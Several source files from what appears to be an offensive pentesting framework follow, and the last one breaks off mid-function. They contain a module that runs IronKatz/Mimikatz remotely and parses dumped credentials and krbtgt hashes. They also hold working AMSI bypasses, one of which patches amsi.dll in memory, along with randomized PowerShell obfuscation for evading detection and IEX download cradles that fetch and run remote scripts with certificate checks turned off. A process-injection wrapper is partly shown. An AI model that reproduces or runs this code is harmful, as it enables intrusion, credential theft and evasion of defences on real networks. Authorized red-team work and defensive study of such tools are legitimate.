    (Invoke-IronKatz), parse the Mimikatz-style output, and feed the
    recovered credentials into the database."""
    def __init__(self):
        self.name = 'Ironkatz'
        self.description = 'Execute SafetyKatz using an embedded Iron Python Engine'
        self.author = ['@m8r0wn']
        self.credit = ['@byt3bl33d3r', '@harmj0y']
        self.requires_admin = True
        self.exec_methods = ['wmiexec', 'smbexec']
        self.args = {}

    def run(self, target, args, smb_con, loggers, config_obj):
        """Build an IEX download cradle for Invoke-IronKatz, execute it on
        the target, parse the output for credentials, and save the raw
        output to the workspace."""
        logger = loggers['console']
        timeout = args.timeout
        loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Ironkatz'])
        try:
            # Define Script Source: local web server (--fileless) or GitHub.
            # Timeout is extended because the engine takes a while to load.
            if args.fileless:
                srv_addr = get_local_ip()
                script_location = 'http://{}/Invoke-Ironkatz.ps1'.format(srv_addr)
                setattr(args, 'timeout', timeout + 60)
            else:
                script_location = 'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1'
                setattr(args, 'timeout', timeout + 25)
            logger.debug('Script source: {}'.format(script_location))

            # Setup PS1 Script
            launcher = powershell.gen_ps_iex_cradle(script_location, '')
            try:
                # Execute
                cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
                results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)

                # Display Output (raw lines only shown with --debug)
                if not results:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                    return
                elif args.debug:
                    for line in results.splitlines():
                        loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])

                # Parse results and send creds to db
                # cred tuple: (credType, domain, username, password, hostname, sid)
                db_updates = 0
                for cred in self.parse_mimikatz(results):
                    if cred[0] == "hash":
                        smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                        db_updates += 1
                    elif cred[0] == "plaintext":
                        smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                        loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                        db_updates += 1
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])

                # write results to file
                file_name = 'ironkatz_{}_{}.txt'.format(target, get_filestamp())
                tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
                tmp_logger.info(results)
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
            except Exception as e:
                if str(e) == "list index out of range":
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
                else:
                    loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))

    def uniquify_tuples(self, tuples):
        """
        uniquify mimikatz tuples based on the password
        cred format- (credType, domain, username, password, hostname, sid)
        Stolen from the Empire project.
        """
        seen = set()
        # set.add() returns None, so "not seen.add(...)" both records the key
        # and keeps the first occurrence in the output list.
        return [item for item in tuples if
                "{}{}{}{}".format(item[0], item[1], item[2], item[3]) not in seen and not seen.add(
                    "{}{}{}{}".format(item[0], item[1], item[2], item[3]))]

    def parse_mimikatz(self, data):
        """
        Parse the output from Invoke-Mimikatz to return credential sets.
        This was directly stolen from the Empire project as well.

        Returns a de-duplicated list of
        (credType, domain, username, password, hostname, sid) tuples.
        """
        # cred format:
        #   credType, domain, username, password, hostname, sid
        creds = []

        # regexes for "sekurlsa::logonpasswords" Mimikatz output
        regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)",
                   "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)",
                   "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)",
                   "(?s)(?<=credman :).*?(?=mimikatz)"]

        hostDomain = ""
        domainSid = ""
        hostName = ""

        lines = data.split("\n")
        # First two lines may carry "Hostname: host.domain / SID"
        for line in lines[0:2]:
            if line.startswith("Hostname:"):
                try:
                    domain = line.split(":")[1].strip()
                    temp = domain.split("/")[0].strip()
                    domainSid = domain.split("/")[1].strip()

                    hostName = temp.split(".")[0]
                    hostDomain = ".".join(temp.split(".")[1:])
                except:
                    pass

        for regex in regexes:
            p = re.compile(regex)
            for match in p.findall(data):
                lines2 = match.split("\n")
                username, domain, password = "", "", ""

                for line in lines2:
                    try:
                        if "Username" in line:
                            username = line.split(":", 1)[1].strip()
                        elif "Domain" in line:
                            domain = line.split(":", 1)[1].strip()
                        elif "NTLM" in line or "Password" in line:
                            password = line.split(":", 1)[1].strip()
                    except:
                        pass

                if username != "" and password != "" and password != "(null)":
                    sid = ""

                    # substitute the FQDN in if it matches
                    if hostDomain.startswith(domain.lower()):
                        domain = hostDomain
                        sid = domainSid

                    if validate_ntlm(password):
                        credType = "hash"
                    else:
                        credType = "plaintext"

                    # ignore machine account plaintexts
                    if not (credType == "plaintext" and username.endswith("$")):
                        creds.append((credType, domain, username, password, hostName, sid))

        if len(creds) == 0:
            # check if we have lsadump output to check for krbtgt
            # happens on domain controller hashdumps
            # Guard the upper bound: output shorter than 13 lines previously
            # raised an uncaught IndexError here.
            for x in range(8, min(13, len(lines))):
                if lines[x].startswith("Domain :"):

                    domain, sid, krbtgtHash = "", "", ""

                    try:
                        domainParts = lines[x].split(":")[1]
                        domain = domainParts.split("/")[0].strip()
                        sid = domainParts.split("/")[1].strip()

                        # substitute the FQDN in if it matches
                        if hostDomain.startswith(domain.lower()):
                            domain = hostDomain
                            sid = domainSid

                        for x in range(0, len(lines)):
                            if lines[x].startswith("User : krbtgt"):
                                krbtgtHash = lines[x + 2].split(":")[1].strip()
                                break

                        if krbtgtHash != "":
                            creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
                    except Exception as e:
                        pass

        if len(creds) == 0:
            # check if we get lsadump::dcsync output
            # NOTE(review): this membership test requires an exact full-line
            # match of '** SAM ACCOUNT **' -- confirm against dcsync output.
            if '** SAM ACCOUNT **' in lines:
                domain, user, userHash, dcName, sid = "", "", "", "", ""

                for line in lines:
                    try:
                        if line.strip().endswith("will be the domain"):
                            domain = line.split("'")[1]
                        elif line.strip().endswith("will be the DC server"):
                            dcName = line.split("'")[1].split(".")[0]
                        elif line.strip().startswith("SAM Username"):
                            user = line.split(":")[1].strip()
                        elif line.strip().startswith("Object Security ID"):
                            parts = line.split(":")[1].strip().split("-")
                            sid = "-".join(parts[0:-1])
                        elif line.strip().startswith("Hash NTLM:"):
                            userHash = line.split(":")[1].strip()
                    except:
                        pass

                if domain != "" and userHash != "":
                    creds.append(("hash", domain, user, userHash, dcName, sid))

        return self.uniquify_tuples(creds)
import os
import importlib
from requests import get
import ar3
"""
A bit confusing how we set it up here but this will ensure
"""
MODULES = {
    # 'module name (also the file name under ar3/modules/)' : {
    #     'Class' : class to instantiate from that file,
    #     'File'  : optional local resource name under ~/.ar3/scripts/,
    #     'URL'   : optional download source for that resource }
    'example_module'          : {'Class' : 'ExampleModule'},
    'test_execution'          : {'Class' : 'TestExecution'},
    'process_hunter'          : {'Class' : 'ProcessHunter'},
    'invert_hunter'           : {'Class' : 'InvertHunter'},
    'user_hunter'             : {'Class' : 'UserHunter'},
    'get_netdomaincontroller' : {'Class' : 'GetNetDomainController'},
    'get_lockedaccounts'      : {'Class' : 'GetLockedAccounts'},
    'wifi_passwords'          : {'Class' : 'WifiPasswords'},
    'gpp_password'            : {'Class' : 'GPP_Password'},
    'kill_defender'           : {'Class' : 'KillDefender'},
    'wdigest'                 : {'Class' : 'Wdigest'},

    'mimikatz'                : {'Class' : 'InvokeMimikatz',
                                 'File'  : 'Invoke-Mimikatz.ps1',
                                 'URL'   : 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'},

    'ironkatz'                : {'Class' : 'IronKatz',
                                 'File'  : 'Invoke-Ironkatz.ps1',
                                 'URL'   : 'https://raw.githubusercontent.com/m8r0wn/OffensiveDLR/master/Invoke-IronKatz.ps1'},

    'invoke_kerberoast'       : {'Class' : 'InvokeKerberoast',
                                 'File'  : 'Invoke-Kerberoast.ps1',
                                 'URL'   : 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'},

    'invoke_vnc'              : {'Class' : 'InvokeVNC',
                                 'File'  : 'Invoke-Vnc.ps1',
                                 'URL'   : 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'},

    'procdump'                : {'Class' : 'ProcDump',
                                 'File'  : 'procdump.exe',
                                 'URL'   : 'https://live.sysinternals.com/procdump.exe'},
}
def list_modules():
    """Print the banner followed by every registered module, its
    description, and each configurable argument with its requirements."""
    print(ar3.banner())
    print(" Active Modules")
    print(" \033[1;30m>>-------------------->\033[1;m")
    for mod_name in MODULES:
        instance = get_module_class(mod_name)()
        print('{:<6} {:<25} {}'.format(' ', mod_name, instance.description))
        for arg_name, arg_data in instance.args.items():
            print('\033[1;30m{:32} |_{}= {} (Required: {})\033[1;m'.format(' ', arg_name, arg_data['Description'], arg_data['Required']))
def populate_mod_args(class_obj, module_args, logger):
    """Parse a comma-separated 'KEY=value' string into class_obj.args.

    Example CLI input: -o 'SERVER=192.168.1.1,PROCESS=cmd.exe'

    Exits the process on an unparsable token or a missing required
    argument.
    """
    arg_split = module_args.strip().split(',')

    # Populate module args
    for x in arg_split:
        if x:
            try:
                # Split on the FIRST '=' only so values may themselves
                # contain '=' (base64 blobs, passwords, etc.); the old
                # unbounded split rejected such values outright.
                arg, value = x.split("=", 1)
                class_obj.args[arg.upper()]['Value'] = value
            except:
                logger.fail("Unable to process arg: \"{}\"".format(x))
                exit(1)

    # Check for required arg
    for arg, data in class_obj.args.items():
        if data['Required'] and not data['Value']:
            logger.warning("{}: Missing required argument \"{}\"".format(class_obj.name, arg))
            exit(1)
def get_module_class(name):
    """Dynamically import ar3.modules.<name> and return the class object
    registered for it in MODULES.

    Raises:
        Exception: if *name* is not a registered module.
    """
    if name not in MODULES:
        raise Exception('Can not find module: {}'.format(name))
    mod = importlib.import_module('.'.join([__name__, name]))
    return getattr(mod, MODULES[name]['Class'])
def get_module_resources():
    """
    Called by first_run to download script resources.

    Any stale local copy under ~/.ar3/scripts/ is removed before the
    fresh download.
    """
    for data in MODULES.values():
        if 'URL' not in data:
            continue
        local = os.path.join(os.path.expanduser('~'), '.ar3', 'scripts', data['File'])
        if os.path.exists(local):
            os.remove(local)
        download_file(data['URL'], local)
def download_file(source, output):
    """Fetch *source* over HTTP(S) and write the response body to *output*.

    The request is performed BEFORE the file is opened, so a failed
    download no longer leaves a truncated/empty file behind, and the
    context manager guarantees the handle is closed on error.
    NOTE: certificate verification is intentionally disabled (verify=False).
    """
    content = get(source, verify=False, timeout=5).content
    with open(output, 'wb') as f:
        f.write(content)
from ar3.core.ldap import LdapCon
class GetLockedAccounts():
    """AR3 module: list active domain accounts that are locked out or one
    bad attempt away from the domain lockout threshold."""
    def __init__(self):
        self.name = 'lockedaccounts'
        self.description = 'List active domain accounts that are locked or within 1 away from the threshold'
        self.author = ['@m8r0wn']
        self.requires_admin = False
        self.args = {
            'THRESHOLD': {
                'Description': 'Lockout threshold if LDAP fails (Default: 3)',
                'Required'   : False,
                'Value'      : 3
            },
            'SERVER': {
                'Description': 'Define LDAP Server',
                'Required'   : False,
                'Value'      : ''
            }
        }

    def run(self, target, args, smb_con, loggers, config_obj):
        """Query LDAP for the domain lockout threshold and all active
        users, then flag every account whose badPwdCount is at (red) or
        one below (yellow) the threshold."""
        logger = loggers['console']
        users = {}
        domain = {}
        try:
            # Create LDAP Con: the module's SERVER arg overrides the
            # command-line LDAP server (it was declared but never used
            # before this fix).
            ldap_server = self.args['SERVER']['Value'] if self.args['SERVER']['Value'] else args.ldap_srv
            x = LdapCon(args, loggers, ldap_server, smb_con.db)
            x.create_ldap_con()
            if not x:
                logger.fail([smb_con.host, smb_con.ip, self.name.upper(), 'Unable to create LDAP connection'])
                return
            logger.success([smb_con.host, smb_con.ip, self.name.upper(), 'Connection established (server: {}) (LDAPS: {})'.format(x.host, x.ldaps)])

            # Get Domain Lockout Threshold; fall back to the THRESHOLD
            # module arg when the domain query fails. (The original read
            # self.args['Lockout'], a key that does not exist, so the
            # fallback always raised KeyError.)
            domain = x.domain_query(False)
            try:
                lockout_threshold = int(domain[list(domain.keys())[0]]['lockoutThreshold'])
                logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Domain Lockout Threshold Detected: {}".format(lockout_threshold), "Logon_Server: {}".format(x.host)])
            except:
                lockout_threshold = int(self.args['THRESHOLD']['Value'])
                logger.info([smb_con.host, smb_con.ip, self.name.upper(), "Lockout threshold detection failed, using default: {}".format(lockout_threshold)])

            # Collect users
            users = x.user_query('active', False)
            logger.debug("{}: Identified {} domain users".format(self.name, str(len(users.keys())),))

            if users:
                # Compare each account's badPwdCount against the threshold
                for user, data in users.items():
                    try:
                        if int(data['badPwdCount']) >= lockout_threshold:
                            logger.success([smb_con.host, smb_con.ip, self.name.upper(), user, "BadPwd: \033[1;31m{:<5}\033[1;m".format(data['badPwdCount']), "Logon_Server: {}".format(x.host)])
                        elif int(data['badPwdCount']) >= (lockout_threshold-1):
                            logger.success([smb_con.host, smb_con.ip, self.name.upper(), user, "BadPwd: \033[1;33m{:<5}\033[1;m".format(data['badPwdCount']), "Logon_Server: {}".format(x.host)])
                    except:
                        pass
            else:
                logger.fail("{}: No users returned from query".format(self.name))
            x.close()
        except Exception as e:
            logger.debug("{} Error: {}".format(self.name, str(e)))
import re
from base64 import b64encode
from string import ascii_lowercase
from random import choice, sample,choices
############################
# PS Code Execution on Host
############################
def create_ps_command(ps_command, logger, force_ps32=False, no_obfs=False, server_os='Windows'):
    """Wrap *ps_command* into a single powershell.exe invocation.

    An AMSI bypass matched to *server_os* is prepended. With *no_obfs* the
    payload is Base64-encoded (-enc); otherwise it is run through
    invoke_obfuscation, retrying up to 5 times to fit within the Windows
    command-line limit of 8191 characters.

    Raises:
        Exception: if no variant fits within 8191 characters.
    """
    logger.debug('Generating PowerShell command')
    amsi_bypass = create_amsi_bypass(server_os)

    if force_ps32:
        # Relaunch the payload as a 32-bit job when running on a 64-bit host
        command = amsi_bypass + """
$functions = {{
function Command-ToExecute
{{
{command}
}}
}}
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
{{
$job = Start-Job -InitializationScript $functions -ScriptBlock {{Command-ToExecute}} -RunAs32
$job | Wait-Job
}}
else
{{
IEX "$functions"
Command-ToExecute
}}
""".format(command=amsi_bypass + ps_command)
    else:
        command = amsi_bypass + ps_command

    if no_obfs:
        command = 'powershell.exe -noni -nop -w 1 -enc {}'.format(encode_ps_command(command).decode("utf-8"))
    else:
        # Keep the unwrapped payload separate so each retry obfuscates the
        # ORIGINAL payload. The previous code fed the already-wrapped
        # command back into invoke_obfuscation, making every retry strictly
        # longer instead of producing a fresh, potentially shorter variant.
        payload = command
        obfs_attempts = 0
        while True:
            command = 'powershell.exe -exec bypass -noni -nop -w 1 -C "{}"'.format(invoke_obfuscation(payload))
            if len(command) <= 8191:
                break
            if obfs_attempts == 4:
                logger.fail('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
                raise Exception('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
            obfs_attempts += 1

    # Final safety net (covers the -enc path as well)
    if len(command) > 8191:
        logger.fail('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
        raise Exception('Command exceeds maximum length of 8191 chars (was {}). exiting.'.format(len(command)))
    return command
def create_amsi_bypass(server_os):
    # Stolen From: https://github.com/awsmhacks/CrackMapExtreme/blob/master/cmx/helpers/powershell.py
    """AMSI bypasses are an ever-changing p.i.t.a

    The default bypass is from amonsec and released around july/2019
    and works on server2016/win10 1804+.
    The default wont work on older window systems though, so we revert
    back to ol' faithful if the os is win7 or 2012.

    Returns a PowerShell snippet (str) chosen by substring match on
    *server_os* ("2012" or "7601" selects the legacy reflection bypass).
    """
    # bypass from amonsec. tweaked and made reliable by the homie @nixbyte
    # https://gist.githubusercontent.com/amonsec/986db36000d82b39c73218facc557628/raw/6b8587154ac478091388bc56d9a04283953800b8/AMSI-Bypass.ps1
    if "2012" in server_os or "7601" in server_os:
        # Legacy path: flip amsiInitFailed via reflection (string is split
        # into concatenated fragments to dodge signature matching)
        amsi_bypass = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}"""
    else:
        # Modern path: patch amsi.dll in-process via VirtualProtect + Copy
        amsi_bypass = """$kk='using System;using System.Runtime.InteropServices;public class kk {[DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule,string lpProcName);[DllImport("kernel32")] public static extern IntPtr LoadLibrary(string lpLibFileName);[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress,UIntPtr dwSize,uint flNewProtect,out uint lpflOldProtect);}';Add-Type $kk;$oldProtectionBuffer=0;[IntPtr]$address=[IntPtr]::Add([kk]::GetProcAddress([kk]::LoadLibrary("amsi.dll"),"DllCanUnloadNow"),2000);[kk]::VirtualProtect($address, [uint32]2, 4, [ref]$oldProtectionBuffer)|Out-Null;[System.Runtime.InteropServices.Marshal]::Copy([byte[]] (0x31,0xC0,0xC3),0,$address,3);[kk]::VirtualProtect($address,[uint32]2,$oldProtectionBuffer,[ref]$oldProtectionBuffer)|Out-Null;"""
    return amsi_bypass
############################
# PS Obfuscation Techniques
############################
def encode_ps_command(command):
    """Base64-encode *command* as UTF-16LE bytes, the encoding expected by
    powershell.exe's -EncodedCommand/-enc switch. Returns bytes."""
    raw = command.encode('UTF-16LE')
    return b64encode(raw)
def invoke_obfuscation(scriptString):
    """
    Taken from the GreatSCT project
    https://raw.githubusercontent.com/GreatSCT/GreatSCT/master/Tools/Bypass/bypass_common/invoke_obfuscation.py

    Rewrites *scriptString* into an equivalent PowerShell one-liner that
    rebuilds the original text from delimited character codes and pipes it
    into an obfuscated Invoke-Expression. Delimiters, casing and syntax
    variants are chosen with random.*, so every call produces different output.
    """
    # Add letters a-z with random case to $RandomDelimiters.
    alphabet = ''.join(choice([i.upper(), i]) for i in ascii_lowercase)
    # Create list of random delimiters called randomDelimiters.
    # Avoid using . * ' " [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.
    randomDelimiters = ['_','-',',','{','}','~','!','@','%','&','<','>',';',':']
    for i in alphabet:
        randomDelimiters.append(i)
    # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.
    randomDelimiters = choices(randomDelimiters, k=int(len(randomDelimiters)/4))
    # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters.
    delimitedEncodedArray = ''
    for char in scriptString:
        delimitedEncodedArray += str(ord(char)) + choice(randomDelimiters)
    # Remove trailing delimiter from $DelimitedEncodedArray.
    delimitedEncodedArray = delimitedEncodedArray[:-1]
    # Create printable version of $RandomDelimiters in random order to be used by final command.
    test = sample(randomDelimiters, len(randomDelimiters))
    randomDelimitersToPrint = ''.join(i for i in test)
    # Generate random case versions for necessary operations.
    forEachObject = choice(['ForEach','ForEach-Object','%'])
    strJoin = ''.join(choice([i.upper(), i.lower()]) for i in '[String]::Join')
    strStr = ''.join(choice([i.upper(), i.lower()]) for i in '[String]')
    join = ''.join(choice([i.upper(), i.lower()]) for i in '-Join')
    charStr = ''.join(choice([i.upper(), i.lower()]) for i in 'Char')
    integer = ''.join(choice([i.upper(), i.lower()]) for i in 'Int')
    forEachObject = ''.join(choice([i.upper(), i.lower()]) for i in forEachObject)
    # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax.
    randomDelimitersToPrintForDashSplit = ''
    for delim in randomDelimiters:
        # Random case 'split' string.
        split = ''.join(choice([i.upper(), i.lower()]) for i in 'Split')
        randomDelimitersToPrintForDashSplit += '-' + split + choice(['', ' ']) + '\'' + delim + '\'' + choice(['', ' '])
    randomDelimitersToPrintForDashSplit = randomDelimitersToPrintForDashSplit.strip('\t\n\r')
    # Randomly select between various conversion syntax options.
    randomConversionSyntax = []
    randomConversionSyntax.append('[' + charStr + ']' + choice(['', ' ']) + '[' + integer + ']' + choice(['', ' ']) + '$_')
    randomConversionSyntax.append('[' + integer + ']' + choice(['', ' ']) + '$_' + choice(['', ' ']) + choice(['-as', '-As', '-aS', '-AS']) + choice(['', ' ']) + '[' + charStr + ']')
    randomConversionSyntax = choice(randomConversionSyntax)
    # Create array syntax for encoded scriptString as alternative to .Split/-Split syntax.
    encodedArray = ''
    for char in scriptString:
        encodedArray += str(ord(char)) + choice(['', ' ']) + ',' + choice(['', ' '])
    # Remove trailing comma from encodedArray
    encodedArray = '(' + choice(['', ' ']) + encodedArray.rstrip().rstrip(',') + ')'
    # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable).
    # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists.
    # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls
    # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables
    setOfsVarSyntax = []
    setOfsVarSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "''")
    setOfsVarSyntax.append(choice(['Set-Variable', 'SV', 'SET']) + choice([' '*1, ' '*2]) + "'OFS'" + choice([' '*1, ' '*2]) + "''")
    setOfsVar = choice(setOfsVarSyntax)
    setOfsVarBackSyntax = []
    setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
    setOfsVarBackSyntax.append('Set-Item' + choice([' '*1, ' '*2]) + "'Variable:OFS'" + choice([' '*1, ' '*2]) + "' '")
    setOfsVarBack = choice(setOfsVarBackSyntax)
    # Randomize case of $SetOfsVar and $SetOfsVarBack.
    setOfsVar = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVar)
    setOfsVarBack = ''.join(choice([i.upper(), i.lower()]) for i in setOfsVarBack)
    # Generate the code that will decrypt and execute the payload and randomly select one.
    # NOTE: 'split' below reuses the random-cased token left over from the final
    # iteration of the delimiter loop above (randomDelimiters is never empty).
    baseScriptArray = []
    baseScriptArray.append('[' + charStr + '[]' + ']' + choice(['', ' ']) + encodedArray)
    baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'." + split + "(" + choice(['', ' ']) + "'" + randomDelimitersToPrint + "'" + choice(['', ' ']) + ')' + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
    baseScriptArray.append('(' + choice(['', ' ']) + "'" + delimitedEncodedArray + "'" + choice(['', ' ']) + randomDelimitersToPrintForDashSplit + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
    baseScriptArray.append('(' + choice(['', ' ']) + encodedArray + choice(['', ' ']) + '|' + choice(['', ' ']) + forEachObject + choice(['', ' ']) + '{' + choice(['', ' ']) + '(' + choice(['', ' ']) + randomConversionSyntax + ')' + choice(['', ' ']) + '}' + choice(['', ' ']) + ')')
    # Generate random JOIN syntax for all above options
    newScriptArray = []
    newScriptArray.append(choice(baseScriptArray) + choice(['', ' ']) + join + choice(['', ' ']) + "''")
    newScriptArray.append(join + choice(['', ' ']) + choice(baseScriptArray))
    newScriptArray.append(strJoin + '(' + choice(['', ' ']) + "''" + choice(['', ' ']) + ',' + choice(['', ' ']) + choice(baseScriptArray) + choice(['', ' ']) + ')')
    newScriptArray.append('"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVar + choice(['', ' ']) + ')' + choice(['', ' ']) + '"' + choice(['', ' ']) + '+' + choice(['', ' ']) + strStr + choice(baseScriptArray) + choice(['', ' ']) + '+' + '"' + choice(['', ' ']) + '$(' + choice(['', ' ']) + setOfsVarBack + choice(['', ' ']) + ')' + choice(['', ' ']) + '"')
    # Randomly select one of the above commands.
    newScript = choice(newScriptArray)
    # Generate random invoke operation syntax.
    # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies.
    invokeExpressionSyntax = []
    invokeExpressionSyntax.append(choice(['IEX', 'Invoke-Expression']))
    # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &.
    # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet.
    # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc.
    invocationOperator = choice(['.','&']) + choice(['', ' '])
    invokeExpressionSyntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')")
    invokeExpressionSyntax.append(invocationOperator + "( $PSHome[" + choice(['4', '21']) + "]+$PSHOME[" + choice(['30', '34']) + "]+'x')")
    invokeExpressionSyntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')")
    invokeExpressionSyntax.append(invocationOperator + "( $env:ComSpec[4," + choice(['15', '24', '26']) + ",25]-Join'')")
    invokeExpressionSyntax.append(invocationOperator + "((" + choice(['Get-Variable','GV','Variable']) + " '*mdr*').Name[3,11,2]-Join'')")
    invokeExpressionSyntax.append(invocationOperator + "( " + choice(['$VerbosePreference.ToString()','([String]$VerbosePreference)']) + "[1,3]+'x'-Join'')")
    # Randomly choose from above invoke operation syntaxes.
    invokeExpression = choice(invokeExpressionSyntax)
    # Randomize the case of selected invoke operation.
    invokeExpression = ''.join(choice([i.upper(), i.lower()]) for i in invokeExpression)
    # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)
    invokeOptions = []
    invokeOptions.append(choice(['', ' ']) + invokeExpression + choice(['', ' ']) + '(' + choice(['', ' ']) + newScript + choice(['', ' ']) + ')' + choice(['', ' ']))
    invokeOptions.append(choice(['', ' ']) + newScript + choice(['', ' ']) + '|' + choice(['', ' ']) + invokeExpression)
    obfuscatedPayload = choice(invokeOptions)
    return obfuscatedPayload
############################
# Script Execution
############################
def clean_ps_script(script_path):
    """Read a PowerShell script and strip comments and chatty output.

    Removes <# ... #> block comments, blank lines, lines starting with '#',
    and Write-Verbose / Write-Debug statements. Returns the cleaned source.
    """
    with open(script_path, 'r') as handle:
        source = handle.read()
    # Strip block comments first so their inner lines never reach the filter.
    source = re.sub(re.compile('<#.*?#>', re.DOTALL), '', source)
    kept = []
    for line in source.split('\n'):
        candidate = line.strip()
        if not candidate or candidate.startswith("#"):
            continue
        lowered = candidate.lower()
        if lowered.startswith("write-verbose ") or lowered.startswith("write-debug "):
            continue
        kept.append(line)
    return "\n".join(kept)
def gen_ps_iex_cradle(script, command=str('')):
    """Generate a PowerShell download cradle that fetches and IEX's *script*.

    script  : URL of the PowerShell script to download.
    command : optional follow-on command appended after the cradle.

    Windows 2008 R2 / Windows 7 default to Ssl3,Tls (TLS 1.1/1.2 disabled),
    so the cradle pins SecurityProtocol accordingly; no per-OS check is
    needed since the HTTP server always speaks TLS 1.0.
    """
    # Accept any server certificate (the payload server is self-signed).
    # Fix: this string is never run through str.format(), so the braces must
    # NOT be doubled — '{{$true}}' emitted literal doubled braces into the
    # PowerShell (compare the correct '{$true}' used by the AMSI bypass).
    launcher = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n"
    launcher += "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls'\n"
    launcher += "IEX (New-Object Net.WebClient).DownloadString('{}');\n".format(script)
    launcher += command
    return launcher.strip()
############################
# Module Execution
############################
def gen_ps_inject(command, context=None, procname='explorer.exe', inject_once=False):
    """Wrap *command* in PowerShell that injects it into *procname* processes
    via Invoke-PSInject, preferring a process owned by the console user.

    When *context* is truthy the script is wrapped in a download cradle for
    Invoke-PSInject.ps1; otherwise the raw injection script is returned.
    """
    # The following code gives us some control over where and how Invoke-PSInject does its thang
    # It prioritizes injecting into a process of the active console session
    # NOTE(review): encode_ps_command() returns bytes, so "{command}" embeds a
    # Python b'...' literal into the generated PowerShell — confirm callers
    # expect this representation.
    ps_code = '''
$injected = $False
$inject_once = {inject_once}
$command = "{command}"
$owners = @{{}}
$console_login = gwmi win32_computersystem | select -exp Username
gwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{
    if ($_.getowner().domain -and $_.getowner().user){{
    $owners[$_.getowner().domain + "\\" + $_.getowner().user] = $_.handle
    }}
}}
try {{
    if ($owners.ContainsKey($console_login)){{
        Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command
        $injected = $True
        $owners.Remove($console_login)
    }}
}}
catch {{}}
if (($injected -eq $False) -or ($inject_once -eq $False)){{
    foreach ($owner in $owners.Values) {{
